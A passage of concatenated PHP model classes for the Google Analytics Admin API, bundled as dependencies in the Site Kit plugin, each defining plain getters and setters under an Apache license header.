License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaChangeHistoryEvent extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'changes'; /** * @var string */ public $actorType; /** * @var string */ public $changeTime; protected $changesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaChangeHistoryChange::class; protected $changesDataType = 'array'; /** * @var bool */ public $changesFiltered; /** * @var string */ public $id; /** * @var string */ public $userActorEmail; /** * @param string */ public function setActorType($actorType) { $this->actorType = $actorType; } /** * @return string */ public function getActorType() { return $this->actorType; } /** * @param string */ public function setChangeTime($changeTime) { $this->changeTime = $changeTime; } /** * @return string */ public function getChangeTime() { return $this->changeTime; } /** * @param GoogleAnalyticsAdminV1alphaChangeHistoryChange[] */ public function setChanges($changes) { $this->changes = $changes; } /** * @return GoogleAnalyticsAdminV1alphaChangeHistoryChange[] */ public function getChanges() { return $this->changes; } /** * @param bool */ public function setChangesFiltered($changesFiltered) { $this->changesFiltered = $changesFiltered; } /** * @return bool */ public function getChangesFiltered() { return $this->changesFiltered; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setUserActorEmail($userActorEmail) { $this->userActorEmail = $userActorEmail; } /** * @return string */ public function getUserActorEmail() { return $this->userActorEmail; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaChangeHistoryEvent::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaChangeHistoryEvent'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessQuota extends \Google\Site_Kit_Dependencies\Google\Model { protected $concurrentRequestsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus::class; protected $concurrentRequestsDataType = ''; protected $serverErrorsPerProjectPerHourType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus::class; protected $serverErrorsPerProjectPerHourDataType = ''; protected $tokensPerDayType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus::class; protected $tokensPerDayDataType = ''; protected $tokensPerHourType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus::class; protected $tokensPerHourDataType = ''; protected $tokensPerProjectPerHourType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus::class; protected $tokensPerProjectPerHourDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaAccessQuotaStatus */ public function setConcurrentRequests(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus $concurrentRequests) { $this->concurrentRequests = $concurrentRequests; } /** * @return GoogleAnalyticsAdminV1alphaAccessQuotaStatus */ public function getConcurrentRequests() { return $this->concurrentRequests; } /** * @param GoogleAnalyticsAdminV1alphaAccessQuotaStatus */ public function setServerErrorsPerProjectPerHour(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus $serverErrorsPerProjectPerHour) { $this->serverErrorsPerProjectPerHour = $serverErrorsPerProjectPerHour; } /** * @return GoogleAnalyticsAdminV1alphaAccessQuotaStatus */ public function getServerErrorsPerProjectPerHour() { return $this->serverErrorsPerProjectPerHour; } /** * @param GoogleAnalyticsAdminV1alphaAccessQuotaStatus */ public function setTokensPerDay(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus $tokensPerDay) { $this->tokensPerDay = $tokensPerDay; } /** * @return GoogleAnalyticsAdminV1alphaAccessQuotaStatus */ public function getTokensPerDay() { return $this->tokensPerDay; } /** * @param GoogleAnalyticsAdminV1alphaAccessQuotaStatus */ public function setTokensPerHour(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus $tokensPerHour) { $this->tokensPerHour = $tokensPerHour; } /** * @return GoogleAnalyticsAdminV1alphaAccessQuotaStatus */ public function getTokensPerHour() { return $this->tokensPerHour; } /** * @param GoogleAnalyticsAdminV1alphaAccessQuotaStatus */ public function setTokensPerProjectPerHour(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus $tokensPerProjectPerHour) { $this->tokensPerProjectPerHour = $tokensPerProjectPerHour; } /** * @return GoogleAnalyticsAdminV1alphaAccessQuotaStatus */ public function getTokensPerProjectPerHour() { return $this->tokensPerProjectPerHour; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuota::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessQuota'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'userLinks'; protected $userLinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class; protected $userLinksDataType = 'array'; /** * @param GoogleAnalyticsAdminV1alphaUserLink[] */ public function setUserLinks($userLinks) { $this->userLinks = $userLinks; } /** * @return GoogleAnalyticsAdminV1alphaUserLink[] */ public function getUserLinks() { return $this->userLinks; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListCustomDimensionsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'customDimensions'; protected $customDimensionsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomDimension::class; protected $customDimensionsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaCustomDimension[] */ public function setCustomDimensions($customDimensions) { $this->customDimensions = $customDimensions; } /** * @return GoogleAnalyticsAdminV1betaCustomDimension[] */ public function getCustomDimensions() { return $this->customDimensions; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListCustomDimensionsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListCustomDimensionsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaExpandedDataSet extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'metricNames'; /** * @var string */ public $dataCollectionStartTime; /** * @var string */ public $description; protected $dimensionFilterExpressionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression::class; protected $dimensionFilterExpressionDataType = ''; /** * @var string[] */ public $dimensionNames; /** * @var string */ public $displayName; /** * @var string[] */ public $metricNames; /** * @var string */ public $name; /** * @param string */ public function setDataCollectionStartTime($dataCollectionStartTime) { $this->dataCollectionStartTime = $dataCollectionStartTime; } /** * @return string */ public function getDataCollectionStartTime() { return $this->dataCollectionStartTime; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression */ public function setDimensionFilterExpression(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression $dimensionFilterExpression) { $this->dimensionFilterExpression = $dimensionFilterExpression; } /** * @return GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression */ public function getDimensionFilterExpression() { return $this->dimensionFilterExpression; } /** * @param string[] */ public function setDimensionNames($dimensionNames) { $this->dimensionNames = $dimensionNames; } /** * @return string[] */ public function getDimensionNames() { return $this->dimensionNames; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string[] */ public function setMetricNames($metricNames) { $this->metricNames = $metricNames; } /** * @return string[] */ public function getMetricNames() { return $this->metricNames; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSet::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaExpandedDataSet'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaChangeHistoryChange extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $action; /** * @var string */ public $resource; protected $resourceAfterChangeType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource::class; protected $resourceAfterChangeDataType = ''; protected $resourceBeforeChangeType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource::class; protected $resourceBeforeChangeDataType = ''; /** * @param string */ public function setAction($action) { $this->action = $action; } /** * @return string */ public function getAction() { return $this->action; } /** * @param string */ public function setResource($resource) { $this->resource = $resource; } /** * @return string */ public function getResource() { return $this->resource; } /** * @param GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource */ public function setResourceAfterChange(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource $resourceAfterChange) { $this->resourceAfterChange = $resourceAfterChange; } /** * @return GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource */ public function getResourceAfterChange() { return $this->resourceAfterChange; } /** * @param GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource */ public function setResourceBeforeChange(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource $resourceBeforeChange) { $this->resourceBeforeChange = $resourceBeforeChange; } /** * @return GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource */ public function getResourceBeforeChange() { return $this->resourceBeforeChange; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaChangeHistoryChange::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaChangeHistoryChange'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaDataStream extends \Google\Site_Kit_Dependencies\Google\Model { protected $androidAppStreamDataType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStreamAndroidAppStreamData::class; protected $androidAppStreamDataDataType = ''; /** * @var string */ public $createTime; /** * @var string */ public $displayName; protected $iosAppStreamDataType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStreamIosAppStreamData::class; protected $iosAppStreamDataDataType = ''; /** * @var string */ public $name; /** * @var string */ public $type; /** * @var string */ public $updateTime; protected $webStreamDataType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStreamWebStreamData::class; protected $webStreamDataDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaDataStreamAndroidAppStreamData */ public function setAndroidAppStreamData(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStreamAndroidAppStreamData $androidAppStreamData) { $this->androidAppStreamData = $androidAppStreamData; } /** * @return GoogleAnalyticsAdminV1alphaDataStreamAndroidAppStreamData */ public function getAndroidAppStreamData() { return $this->androidAppStreamData; } /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param GoogleAnalyticsAdminV1alphaDataStreamIosAppStreamData */ public function setIosAppStreamData(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStreamIosAppStreamData $iosAppStreamData) { $this->iosAppStreamData = $iosAppStreamData; } /** * @return GoogleAnalyticsAdminV1alphaDataStreamIosAppStreamData */ public function getIosAppStreamData() { return $this->iosAppStreamData; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } /** * @param GoogleAnalyticsAdminV1alphaDataStreamWebStreamData */ public function setWebStreamData(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStreamWebStreamData $webStreamData) { $this->webStreamData = $webStreamData; } /** * @return GoogleAnalyticsAdminV1alphaDataStreamWebStreamData */ public function getWebStreamData() { return $this->webStreamData; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStream::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaDataStream'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessNumericFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $operation; protected $valueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaNumericValue::class; protected $valueDataType = ''; /** * @param string */ public function setOperation($operation) { $this->operation = $operation; } /** * @return string */ public function getOperation() { return $this->operation; } /** * @param GoogleAnalyticsAdminV1alphaNumericValue */ public function setValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaNumericValue $value) { $this->value = $value; } /** * @return GoogleAnalyticsAdminV1alphaNumericValue */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessNumericFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessNumericFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaDataRetentionSettings extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $eventDataRetention; /** * @var string */ public $name; /** * @var bool */ public $resetUserDataOnNewActivity; /** * @param string */ public function setEventDataRetention($eventDataRetention) { $this->eventDataRetention = $eventDataRetention; } /** * @return string */ public function getEventDataRetention() { return $this->eventDataRetention; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param bool */ public function setResetUserDataOnNewActivity($resetUserDataOnNewActivity) { $this->resetUserDataOnNewActivity = $resetUserDataOnNewActivity; } /** * @return bool */ public function getResetUserDataOnNewActivity() { return $this->resetUserDataOnNewActivity; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataRetentionSettings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaDataRetentionSettings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessQuota extends \Google\Site_Kit_Dependencies\Google\Model { protected $concurrentRequestsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus::class; protected $concurrentRequestsDataType = ''; protected $serverErrorsPerProjectPerHourType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus::class; protected $serverErrorsPerProjectPerHourDataType = ''; protected $tokensPerDayType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus::class; protected $tokensPerDayDataType = ''; protected $tokensPerHourType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus::class; protected $tokensPerHourDataType = ''; protected $tokensPerProjectPerHourType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus::class; protected $tokensPerProjectPerHourDataType = ''; /** * @param GoogleAnalyticsAdminV1betaAccessQuotaStatus */ public function setConcurrentRequests(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus $concurrentRequests) { $this->concurrentRequests = $concurrentRequests; } /** * @return GoogleAnalyticsAdminV1betaAccessQuotaStatus */ public function getConcurrentRequests() { return $this->concurrentRequests; } /** * @param GoogleAnalyticsAdminV1betaAccessQuotaStatus */ public function setServerErrorsPerProjectPerHour(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus $serverErrorsPerProjectPerHour) { $this->serverErrorsPerProjectPerHour = $serverErrorsPerProjectPerHour; } /** * @return GoogleAnalyticsAdminV1betaAccessQuotaStatus */ public function getServerErrorsPerProjectPerHour() { return $this->serverErrorsPerProjectPerHour; } /** * @param GoogleAnalyticsAdminV1betaAccessQuotaStatus */ public function setTokensPerDay(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus $tokensPerDay) { $this->tokensPerDay = $tokensPerDay; } /** * @return GoogleAnalyticsAdminV1betaAccessQuotaStatus */ public function getTokensPerDay() { return $this->tokensPerDay; } /** * @param GoogleAnalyticsAdminV1betaAccessQuotaStatus */ public function setTokensPerHour(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus $tokensPerHour) { $this->tokensPerHour = $tokensPerHour; } /** * @return GoogleAnalyticsAdminV1betaAccessQuotaStatus */ public function getTokensPerHour() { return $this->tokensPerHour; } /** * @param GoogleAnalyticsAdminV1betaAccessQuotaStatus */ public function setTokensPerProjectPerHour(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuotaStatus $tokensPerProjectPerHour) { $this->tokensPerProjectPerHour = $tokensPerProjectPerHour; } /** * @return GoogleAnalyticsAdminV1betaAccessQuotaStatus */ public function getTokensPerProjectPerHour() { return $this->tokensPerProjectPerHour; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessQuota::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessQuota'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaCustomDimension extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $description; /** * @var bool */ public $disallowAdsPersonalization; /** * @var string */ public $displayName; /** * @var string */ public $name; /** * @var string */ public $parameterName; /** * @var string */ public $scope; /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param bool */ public function setDisallowAdsPersonalization($disallowAdsPersonalization) { $this->disallowAdsPersonalization = $disallowAdsPersonalization; } /** * @return bool */ public function getDisallowAdsPersonalization() { return $this->disallowAdsPersonalization; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setParameterName($parameterName) { $this->parameterName = $parameterName; } /** * @return string */ public function getParameterName() { return $this->parameterName; } /** * @param string */ public function setScope($scope) { $this->scope = $scope; } /** * @return string */ public function getScope() { return $this->scope; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCustomDimension::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaCustomDimension'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaConversionEventDefaultConversionValue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $currencyCode; public $value; /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } public function setValue($value) { $this->value = $value; } public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEventDefaultConversionValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaConversionEventDefaultConversionValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaPropertySummary extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $displayName; /** * @var string */ public $parent; /** * @var string */ public $property; /** * @var string */ public $propertyType; /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setParent($parent) { $this->parent = $parent; } /** * @return string */ public function getParent() { return $this->parent; } /** * @param string */ public function setProperty($property) { $this->property = $property; } /** * @return string */ public function getProperty() { return $this->property; } /** * @param string */ public function setPropertyType($propertyType) { $this->propertyType = $propertyType; } /** * @return string */ public function getPropertyType() { return $this->propertyType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaPropertySummary::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaPropertySummary'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaRunAccessReportRequest extends 